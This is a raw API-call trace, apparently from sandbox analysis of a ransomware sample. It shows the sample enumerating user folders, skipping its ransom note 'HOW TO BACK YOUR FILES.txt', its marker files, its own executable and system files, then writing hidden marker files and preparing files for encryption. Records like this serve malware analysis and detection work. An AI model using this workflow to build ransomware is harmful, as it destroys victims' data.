ftLastWriteTime.dwLowDateTime=0xb7fe6fe6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.787] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.788] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.788] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.788] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.788] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.788] lstrlenW (lpString="Rabbit4444") returned 10 [0070.788] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.788] lstrlenW (lpString=".dll") returned 4 [0070.788] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.788] lstrlenW (lpString=".lnk") returned 4 [0070.788] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.788] lstrlenW (lpString=".ini") returned 4 [0070.788] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.788] lstrlenW (lpString=".sys") returned 4 [0070.788] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.788] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4852ad82, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4852ad82, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb7fe6fe6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.788] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.788] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.788] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.789] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.789] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.789] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.789] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.789] lstrlenW (lpString="Rabbit4444") returned 10 [0070.789] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.789] lstrlenW (lpString=".dll") returned 4 [0070.789] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.789] lstrlenW (lpString=".lnk") returned 4 [0070.789] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.789] lstrlenW (lpString=".ini") returned 4 [0070.789] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.789] lstrlenW (lpString=".sys") returned 4 [0070.789] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.789] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4852ad82, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4852ad82, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb7fe6fe6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.789] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0070.789] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.790] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310091\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.790] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.790] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.790] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.791] CloseHandle (hObject=0x29c) returned 1 [0070.791] CloseHandle (hObject=0x27c) returned 1 [0070.791] GetCurrentThreadId () returned 0xd98 [0070.791] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0070.791] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333" [0070.791] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104f88 | out: hHeap=0xe0000) returned 1 [0070.791] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0070.791] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333" [0070.791] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\" [0070.791] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\.BFC0E91B00AE8A0620D3" [0070.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\296333\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.797] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.799] FlushFileBuffers (hFile=0x228) returned 1 [0070.800] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.800] CloseHandle (hObject=0x228) returned 1 [0070.800] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333") returned 142 [0070.800] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.800] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4605c7d4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4605c7d4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf385cb58, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0070.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.801] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.801] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.801] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.801] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4605c7d4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4605c7d4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf385cb58, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.801] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.801] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.801] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.801] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.801] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.801] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf385cb58, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf385cb58, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf385cb58, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.801] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.801] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.801] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4605c7d4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4605c7d4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa1b46974, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.801] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.801] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.801] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.802] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.802] lstrlenW (lpString="Rabbit4444") returned 10 [0070.802] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.802] lstrlenW (lpString=".dll") returned 4 [0070.802] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.802] lstrlenW (lpString=".lnk") returned 4 [0070.802] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.802] lstrlenW (lpString=".ini") returned 4 [0070.802] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.802] lstrlenW (lpString=".sys") returned 4 [0070.802] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.802] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4605c7d4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4605c7d4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa1b46974, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.802] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.802] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.802] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.803] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.803] lstrlenW (lpString="Rabbit4444") returned 10 [0070.803] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.803] lstrlenW (lpString=".dll") returned 4 [0070.803] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.803] lstrlenW (lpString=".lnk") returned 4 [0070.803] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.803] lstrlenW (lpString=".ini") returned 4 [0070.803] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.803] lstrlenW (lpString=".sys") returned 4 [0070.803] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.803] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4605c7d4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4605c7d4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa1b46974, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.803] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0070.803] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.803] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\296333\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\296333\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.804] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.804] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.804] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.804] CloseHandle (hObject=0x260) returned 1 [0070.804] CloseHandle (hObject=0x228) returned 1 [0070.804] GetCurrentThreadId () returned 0xd98 [0070.804] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0070.804] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819" [0070.804] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104e60 | out: hHeap=0xe0000) returned 1 [0070.804] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0070.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819" [0070.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\" [0070.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\.BFC0E91B00AE8A0620D3" [0070.805] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.808] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.810] FlushFileBuffers (hFile=0x228) returned 1 [0070.810] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.811] CloseHandle (hObject=0x228) returned 1 [0070.811] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819") returned 142 [0070.811] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.811] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x464fb0dc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xaa1a6676, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf385cb58, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0070.811] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.811] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.811] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.811] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.811] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x464fb0dc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xaa1a6676, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf385cb58, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.812] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 